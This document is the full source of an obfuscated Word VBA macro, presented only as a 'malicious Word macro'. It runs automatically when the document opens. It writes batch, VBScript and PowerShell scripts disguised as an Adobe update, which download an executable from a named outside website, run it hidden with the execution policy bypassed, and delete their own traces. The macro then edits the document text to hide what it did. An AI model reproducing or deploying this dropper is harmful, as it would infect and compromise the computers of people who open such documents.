Malicious Word Macro

1. Attribute VB_Name = "ThisDocument"
2. Attribute VB_Base = "1Normal.ThisDocument"
3. Attribute VB_GlobalNameSpace = False
4. Attribute VB_Creatable = False
5. Attribute VB_PredeclaredId = True
6. Attribute VB_Exposed = True
7. Attribute VB_TemplateDerived = True
8. Attribute VB_Customizable = True
9. Sub Auto_Open()
10.     h
11. End Sub
12. Sub h()
13. Dim ASJDIWQ, ASKDHQ, ASKDJLQWKJD
14. Dim MY_FILENDIR, ASDASDSA, MY_FILDIR, XPFILEDIR
15.      USER = Environ("us" + "er" + "name")
16.      ds = 100
17.      jks = ds
18.      
19.      PST2 = "a" + "dobe" & "acd-u" & "pdate"
20.      VBT2 = "a" + Chr(100) + "o" & "b" & "ea" & "cd-up" & "da" & "te"
21.      VBTXP2 = "a" & Chr(100) & "o" & "be" + "ac" & "d-u" + "pd" + "atex" + "p"
22.      BART2 = "a" + Chr(100) & "o" & "b" & "e" + "ac" & "d-up" + "date"
23.      
24.      PST1 = PST2 + "." + Chr(Asc("p")) + Chr(ds + 15) + "1"
25.      VBT1 = VBT2 + "." + Chr(118) + "b" + Chr(Asc("s")) + ""
26.      VBTXP = VBTXP2 + "." + Chr(Asc("v")) + Chr(Asc("b")) + "s" + ""
27.      BART = BART2 + Chr(Abs(46)) + Chr(Abs(98)) + Chr(Asc(Chr(Asc("a")))) + Chr(Asc(Chr(ds + 16))) + ""
28.      
29.      MY_FILENDIR = "c:\" + Chr(Asc("U")) + "sers\" + USER + "\AppData\Local\Temp\" + PST1
30.      ASJDKHSJADASDSA = "jklasdjkdsajklsdajkljklsakjlsadjsdkjlsajkdlsajklsadjkladsljksad"
31.      ASDASDSA = "c:\" + Chr(Asc("U")) + "sers\" + USER + "\App" + Chr(Asc("D")) + "ata\Local\" + Chr(Asc("T")) + "emp\" + BART
32.      MY_FILDIR = "c:\Users\" + USER + "\AppData\Local\Temp\" + VBT1
33.      XPFILEDIR = "c:\Windows\Temp\" + VBTXP
34.      TRT = "c:\Windows\Temp\" + BART
35.      KRT = TRT
36.      HYF = KRT
37.      
38.       On Error Resume Next
39.      SetAttr MY_FILENDIR, vbNormal
40.      
41.      If (Len(Dir(MY_FILENDIR)) <> 0) Then
42.       Kill MY_FILENDIR
43.      End If
44.      
45.      On Error Resume Next
46.      SetAttr ASDASDSA, vbNormal
47.      If (Dir(ASDASDSA) <> "") Then
48.       Kill ASDASDSA
49.      End If
50.      
51.      On Error Resume Next
52.      SetAttr MY_FILDIR, vbNormal
53.      If (Dir(MY_FILDIR) <> "") Then
54.       Kill MY_FILDIR
55.      End If
56.      
57.      On Error Resume Next
58.      SetAttr XPFILEDIR, vbNormal
59.      If (Dir(XPFILEDIR) <> "") Then
60.       Kill XPFILEDIR
61.      End If
62.      
63.      Dim FileNumber As Integer
64.      Dim FileNumb As Integer
65.      Dim FileNu As Integer
66.      Dim FileNuG As Integer
67.      Dim FileNukk As Integer
68.      Dim FileNs As Integer
69.      Dim mttt As Integer
70.      Dim retVal As Variant
71.      Dim jskw As Integer
72.      FileNumber = FreeFile
73.      FileNumb = FreeFile
74.      FileNu = FreeFile
75.      FileNukk = FreeFile
76.      FileNs = FreeFile
77.      FileNuG = FreeFile
78.      Dim objWMIService As Variant
79.     Dim colOperatingSystems As Variant
80.     Dim objOperatingSystem As Variant
81.     Set objWMIService = GetObject("winmgmts:{impersonationLevel=impersonate}!\\" & ".\root\cimv2")
82.     Set colOperatingSystems = objWMIService.ExecQuery("Select * from Win32_OperatingSystem")
83.     For Each objOperatingSystem In colOperatingSystems
84.         SysReport = SysReport & "The operating system on this computer is " & _
85.             objOperatingSystem.Caption & "  (" & objOperatingSystem.Version & ")"
86.     Next
87.      
88.      Set objWMIService = GetObject("winmgmts:{impersonationLevel=impersonate}!\\" & ".\root\cimv2")
89.      Set colOperatingSystems = objWMIService.ExecQuery("Select * from Win32_OperatingSystem")
90.      For Each objOperatingSystem In colOperatingSystems
91.         winverstr = objOperatingSystem.Version
92.     Next
93.    
94.    
95.     winver = Val(winverstr)
96.     WaitFor (1)
97.     jskw = winver
98.  
99.  If (jskw <= 5.5) Then
100.      Open HYF For Output As #FileNuG
101.      Print #FileNuG, "@echo off"
102.      Print #FileNuG, "ping 1.1.2.2 -n" & " 2"
103.      Print #FileNuG, ":ksadatk"
104.      KALJSKAD = "kljsdadajskjdk llsajklasjsaja lSKJKSDK Sklajd askjdlskajd lksaj dklsaj dklsja kld jas"
105.      PIKUIASD = "asldkjskaldj skaj dklsaj klsaj kljklsa dasLsda;as " + "aksjdklsadj slak"
106.      Print #FileNuG, ":kcscriptw"
107.      Print #FileNuG, ":asdsadas"
108.      Print #FileNuG, ":cscripdiqwojd"
109.      Print #FileNuG, "c" & "s" + "c" & "ri" & "pt" & ".e" & Chr(120) & "e " & Chr(34) & "c:\Windows\Temp" + "\" + VBTXP + Chr(34) + ""
110.      Print #FileNuG, "ping 1.1.2.2 -n" & " 2"
111.      KALJSKAD = "kljsdadajskjdk llsajklasjsaja lSKJKSDK Sklajd askjdlskajd lksaj dklsaj dklsja kld jas"
112.      PIKUIASD = "asldkjskaldj skaj dklsaj klsaj kljklsa dasLsda;as " + "aksjdklsadj slak"
113.      Print #FileNuG, "" & ":windows"
114.      KALJSKAD = "kljsdadajskjdk llsajklasjsaja lSKJKSDK Sklajd askjdlskajd lksaj dklsaj dklsja kld jas"
115.      PIKUIASD = "asldkjskaldj skaj dklsaj klsaj kljklsa dasLsda;as " + "aksjdklsadj slak"
116.      Print #FileNuG, "c:\W" + "indows\Te" + "mp\444" + "." + Chr(Asc("e")) + "x" + "e"
117.      Print #FileNuG, ":loop"
118.      Print #FileNuG, "ping 1.1.2.2 -n" & " 1"
119.      Print #FileNuG, "del " + Chr(34) + "c:\Windows\Temp\" + VBTXP + Chr(34)
120.      Print #FileNuG, "del " + Chr(34) + "c:\Windows\Temp\" + BART + Chr(34)
121.      Print #FileNuG, "if " + "exist " + Chr(34) + "c:\W" + "indows\T" + "emp\" + BART + Chr(34) + " goto loop"
122.      Print #FileNuG, "if " + "exist " + Chr(34) + "c:\W" + "indows\T" + "emp\" + VBTXP + Chr(34) + " goto loop"
123.      Print #FileNuG, "exit"
124.      Close #FileNuG
125.      
126.      WaitFor (2)
127.      mttt = 88
128.  
129.      Open XPFILEDIR For Output As #FileNumber
130.      Print #FileNumber, "strRT = " + Chr(34) + "h" + Chr(Asc(Chr(Asc("t")))) + "t" + "p" + "://vestegnenbordtennis.dk/wp-content/themes/twentyten/vv" + "." + Chr(Asc("e")) + Chr(Asc("x")) + "e" + Chr(34)
131.      Print #FileNumber, "strTecation = " + Chr(34) + "c:\" + Chr(Asc("W")) + "indows\" + Chr(Asc("T")) + "emp\44" + "4" + "." + Chr(Asc("e")) + Chr(Asc("x")) + "e" + Chr(34)
132.      
133.      Print #FileNumber, "Set objXML" + "H" + Chr(Asc("T")) + "TP = C" + "reate" + Chr(Asc("O")) + "bject(" + Chr(34) + "MSXML2" + "." + Chr(mttt) + Chr(mttt - 11) + Chr(mttt - 12) + Chr(72) + Chr(mttt - 4) + Chr(84) + Chr(80) + Chr(mttt - 54) + ")"
134.      'Print #FileNumber, "Set objXML" + "H" + Chr(Asc("T")) + "TP = C" + "reate" + Chr(Asc("O")) + "bject(" + Chr(34) + "MSXML2." + Chr(mttt - 54) + Chr(mttt) + Chr(mttt - 11) + Chr(mttt - 12) + Chr(72) + Chr(84) + Chr(84) + Chr(80) + ")"
135.    
136.      Print #FileNumber, "objXMLHTTP.open " + Chr(34) + "GET" + Chr(34) + ", strRT, False"
137.      
138.      Print #FileNumber, "objXMLHTTP.send() "
139.      Print #FileNumber, "If objXMLHTTP.Status = 200 Then"
140.      
141.      Print #FileNumber, "Set objADOStream = C" + "reateO" + "bject(" + Chr(34) + "A" + "D" + "OD" + "B.S" + "tream" + Chr(34) + ") "
142.      
143.      Print #FileNumber, "objADOStream.Open "
144.      Print #FileNumber, "objADOStream.Type = 1"
145.      Print #FileNumber, "objADOStream.Write objXMLHTTP.Re" + "" + "sp" + "onse" + "Body "
146.      Print #FileNumber, "objADOStream.Position = 0 "
147.      Print #FileNumber, "objADOStream.SaveToFile strTecation "
148.      Print #FileNumber, "objADOStream.Close "
149.      Print #FileNumber, "Set objADOStream = Nothing "
150.      Print #FileNumber, "End if "
151.      Print #FileNumber, "Set objXMLHTTP = Nothing"
152.      Print #FileNumber, "Set objShell " & "=" + " " + Chr(Asc("C")) + "reate" + "O" + "bject(" + Chr(34) + "W" + "S" + "cript." + "S" + "hell" + Chr(34) + ")"
153.      Close #FileNumber
154.      
155.      WaitFor (1)
156.      
157.      ASKJD = TRT
158.      retVal = Shell(ASKJD, 0)
159.      
160. End If
161.  
162.  
163. If (winver > 5.5) Then
164.      Open MY_FILENDIR For Output As #FileNumber
165.      Print #FileNumber, "$down = " + Chr(Asc("N")) & "ew" & "-" & Chr(79) & "bject " & Chr(Asc(Chr(Asc("S")))) & "y" & "stem." & Chr(78) & "et." & Chr(87) & "eb" & "Cli" & "ent;"
166.      Print #FileNumber, "$url  = '" + Chr(Asc(Chr(Asc("h")))) + Chr(Asc(Chr(Asc("t")))) + Chr(Asc("t")) + Chr(Asc(Chr(Asc("p")))) + "://vestegnenbordtennis.dk/wp-content/themes/twentyten/vv" & ".e" & "x" + "e';"
167.      Print #FileNumber, "$file = 'c:\Users\" + USER + "\AppData\Local\Temp\" + "4" & "44." + Chr(101) & "xe';"
168.      Print #FileNumber, "$down.headers[" + Chr(39) + "User-Agent" + Chr(39) + "] = 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10) AppleWebKit/600.1.25 (KHTML, like Gecko) Version/8.0 Saf" & "ari/600.1.25';" + ""
169.      Print #FileNumber, "$d" + "o" & Chr(Asc("w")) + "n" & "." & Chr(68) & "ow" & "nloa" & "dFi" & "le($u" & "rl,$" & "file);"
170.      Print #FileNumber, "$ScriptDir = $MyInvocation.ScriptName;"
171.      Print #FileNumber, "$someFilePath = 'c:\Users\" + USER + "\AppData\Local\Temp\" + "444.e" & Chr(Asc("x")) + "e" & "';"
172.    
173.      Print #FileNumber, "$vbsFilePath = 'c:\Users\" + USER + "\AppData\Local\Temp\" + VBT2 + Chr(39) + Chr(43) + Chr(39) + "." + Chr(39) + Chr(43) + Chr(39) + "v" + Chr(39) + Chr(43) + Chr(39) + "bs" + Chr(39) + ";"
174.      Print #FileNumber, "$b" + "a" + "tFilePath = 'c:\Users\" + USER + "\AppData\Local\Temp\" + BART2; Chr(39) + Chr(43) + Chr(39) + "." + Chr(39) + Chr(43) + Chr(39) + "b" + Chr(39) + Chr(43) + Chr(39) + "at" + Chr(39) + ";"
175.      Print #FileNumber, "$p" + "sFilePath = 'c:\Users\" + USER + "\AppData\Local\Temp\" + PST2 + Chr(39) + Chr(43) + Chr(39) + "." + Chr(39) + Chr(43) + Chr(39) + "p" + Chr(39) + Chr(43) + Chr(39) + "s1" + Chr(39) + ";"
176.      
177.      Print #FileNumber, "Start-Sleep -s 15;"
178.      PRINTFILENUGSAASJHKDJSAKHDS = "ASKDHJASKDJKAHDSHJKASH  HJKAHJSA JK"
179.      PRISAKUDHNTFILENUGSAASJHKDJSAKHDS = "ASKDHJASSJKADHKDJKAHDSHJKASH  HJKAHJKASHDJSA JK"
180.      Print #FileNumber, "c" & Chr(109) & "d.e" & Chr(120) & "e /c  'c:\Users\" + USER + "\AppData\Local\Temp" + "\444.e" & Chr(120) & "e';     "
181.      Print #FileNumber, "$file1 = gci $" + "v" + "b" + "sFilePath -Force"
182.      Print #FileNumber, "$file2 = gci $" + "b" + "a" + "t" + "FilePath -Force"
183.      Print #FileNumber, "$file3 = gci $" + "p" + "s" + "F" + "ilePath -Force"
184.      Print #FileNumber, "If (Test-Path $vbsFilePath){ Remove-Item $vbsFilePath }"
185.      Print #FileNumber, "If (Test-Path $batFilePath){ Remove-Item $batFilePath }"
186.      Print #FileNumber, "If (Test-Path $someFilePath){ Remove-Item $someFilePath }"
187.      Print #FileNumber, "Remove-Item $MyINvocation.InvocationName"
188.      Close #FileNumber
189.    
190.     Open MY_FILDIR For Output As #FileNumb
191.     Print #FileNumb, "Dim dff"
192.     Print #FileNumb, "dff = 68"
193.     Print #FileNumb, "c" & "ur" & Chr(Asc("r")) & "ent" + Chr(Asc("D")) + "irec" + "tory = left(WSc" & "ript.ScriptFullName," & "(L" + "en(W" + "S" + "cri" + "pt.Sc" + "riptFullName))-(len(W" + "Sc" + "ript.ScriptName)))"
194.     Print #FileNumb, "S" & "et o" & "bj" & Chr(Asc("F")) & "SO=C" & "re" & "at" & "eO" & "b" & "je" & "ct(" & Chr(34) & Chr(34) & Chr(34) & "&" & "S" & Chr(34) & Chr("&") & Chr(34) & "cr" & "ipt" & "ing.F" & "ileS" & "ystem" & "Ob" & "ject" & Chr(34) & ")"
195.     Print #FileNumb, "cur" + "rent" + Chr(Asc("F")) + "ile = " & Chr(34) & "C:\" & Chr(Asc("U")) & "sers\" + USER + "\AppData\Local\Temp" + "\" + PST2 + Chr(34) + "&" + Chr(34) + "." + Chr(34) + "&" + Chr(34) + "p" + Chr(34) + "&" + Chr(34) + "s1" + Chr(34)
196.     Print #FileNumb, "" & Chr(83) & "et " & Chr(111) & "bj" & Chr(83) & "hel" + Chr(Asc("l")) + " = Create" & Chr(79) & Chr(98) & "ject(" & Chr(34) & "W" & Chr(115) & "cript." & Chr(115) & "hell" & Chr(34) & ")"
197.     Print #FileNumb, "" & Chr(111) & "bj" & Chr(83) & "hell" & Chr(46) & Chr(82) & "un " & Chr(34) & "p" & Chr(111) & "wer" & Chr(83) & "hell.e" & Chr(120) & "e -n" & Chr(111) & "exit -Exe" & "cutionP" & Chr(111) & "licy" & " byp" & "ass -n" & Chr(111) & "pr" & Chr(111) & "file -file " & Chr(34) & " & currentFile,0,true"
198.     Close #FileNumb
199.    
200.     Open ASDASDSA For Output As #FileNs
201.     Print #FileNs, "@echo off"
202.     Print #FileNs, "ping 1.1.2.2 -n" & " 2"
203.     Print #FileNs, "chcp 1251"
204.     Print #FileNs, ":csakclasjdklas"
205.     Print #FileNs, "set Var1=" + Chr(34) + "." + Chr(34)
206.     Print #FileNs, "set Var2=" + Chr(34) + "v" + Chr(34)
207.     Print #FileNs, "set Var3=" + Chr(34) + "bs" + Chr(34)
208.     Print #FileNs, "c" & "sc" & "ri" & "pt" & Chr(46) + Chr(101) & Chr(120) & "e " & Chr(34) & "c:\Users\" + USER + "\AppData\Local\Temp" + "\" + VBT2 + Chr(34) + "%Var1%%Var2%%Var3%"
209.     Print #FileNs, "exit"
210.     Close #FileNs
211.        
212.     SetAttr MY_FILENDIR, vbNormal
213.     SetAttr ASDASDSA, vbNormal
214.     SetAttr MY_FILDIR, vbNormal
215.      
216.     WaitFor (1)
217.     SJAKLD = ASDASDSA
218.     retVal = Shell(SJAKLD, 0)
219. End If
220.  
221.      
222.      findTest
223.     secondTest
224.     For Each myStoryRange In ActiveDocument.StoryRanges
225.     With myStoryRange.Find
226.         .Text = "<" & "sel" & "ect>"
227.         .Replacement.Text = " "
228.         .Wrap = wdFindContinue
229.         .Execute Replace:=wdReplaceAll
230.     End With
231.     Next myStoryRange
232.  
233.     For Each myStoryRange In ActiveDocument.StoryRanges
234.     With myStoryRange.Find
235.         .Text = "</s" & "ele" & "ct>"
236.         .Replacement.Text = " "
237.         .Wrap = wdFindContinue
238.         .Execute Replace:=wdReplaceAll
239.     End With
240.     Next myStoryRange
241.    
242.     For Each myStoryRange In ActiveDocument.StoryRanges
243.     With myStoryRange.Find
244.         .Text = "<" & "in" & "box>"
245.         .Replacement.Text = " "
246.         .Wrap = wdFindContinue
247.         .Execute Replace:=wdReplaceAll
248.     End With
249.     Next myStoryRange
250.  
251.     For Each myStoryRange In ActiveDocument.StoryRanges
252.     With myStoryRange.Find
253.         .Text = "</" & "in" & "box>"
254.         .Replacement.Text = " "
255.         .Wrap = wdFindContinue
256.         .Execute Replace:=wdReplaceAll
257.     End With
258.     Next myStoryRange
259.      
260.  
261. End Sub
262. Sub WaitFor(NumOfSeconds As Long)
263. Dim SngSec As Long
264. SngSec = Timer + NumOfSeconds
265.  
266. Do While Timer < SngSec
267. DoEvents
268. Loop
269.  
270. End Sub
271.  
272. Sub AutoOpen()
273.     Auto_Open
274. End Sub
275. Sub Workbook_Open()
276.     Auto_Open
277. End Sub
278. Sub findTest()
279. Dim firstTerm As String
280. Dim secondTerm As String
281. Dim rrtt As Range
282. Dim selRange As Range
283. Dim selectedText As String
284.  
285. Set rrtt = ActiveDocument.Range
286. firstTerm = "<" + "s" + "e" & "le" + "ct>"
287. secondTerm = "<" + "/" + "se" + "l" & "ec" + "t>"
288. ASKASAIEJ = "ask as8d j dnkjh12kh1 sad"
289. With rrtt.Find
290. .Text = firstTerm
291. .MatchWholeWord = True
292. .Execute
293. ASKUKKIEJ = "aasdlkasjdask as8d j dnkjh12kh1 sad"
294. rrtt.Collapse direction:=wdCollapseEnd
295. Set selRange = ActiveDocument.Range
296. selRange.Start = rrtt.End
297. .Text = secondTerm
298. .MatchWholeWord = True
299. .Execute
300. ASKSASADW = "asjldklas"
301. rrtt.Collapse direction:=wdCollapseStart
302. selRange.End = rrtt.Start
303. selectedText = selRange.Delete
304. End With
305. End Sub
306.  
307. Sub secondTest()
308. Dim firstTerm As String
309. Dim secondTerm As String
310. Dim myRanget As Range
311. Dim yytt As Range
312. Dim selRanget As Range
313. Dim selectedTextt As String
314.  
315. Set yytt = ActiveDocument.Range
316. firstTerm = "<" + "in" & "bo" + "x>"
317. secondTerm = "</" + "in" & "bo" + "x>"
318. With yytt.Find
319. .Text = firstTerm
320. .MatchWholeWord = True
321. .Execute
322. ASKIEJ = "ask as8d j dnkjh12kh1 sad"
323. yytt.Collapse direction:=wdCollapseEnd
324.  
325. Set selRanget = ActiveDocument.Range
326. selRanget.Start = yytt.End
327. .Text = secondTerm
328. .MatchWholeWord = True
329. .Execute
330.  
331. yytt.Collapse direction:=wdCollapseStart
332. selRanget.End = yytt.Start
333. selectedTextt = selRanget
334. selRanget.Font.Color = wdColorBlack
335. End With
336. End Sub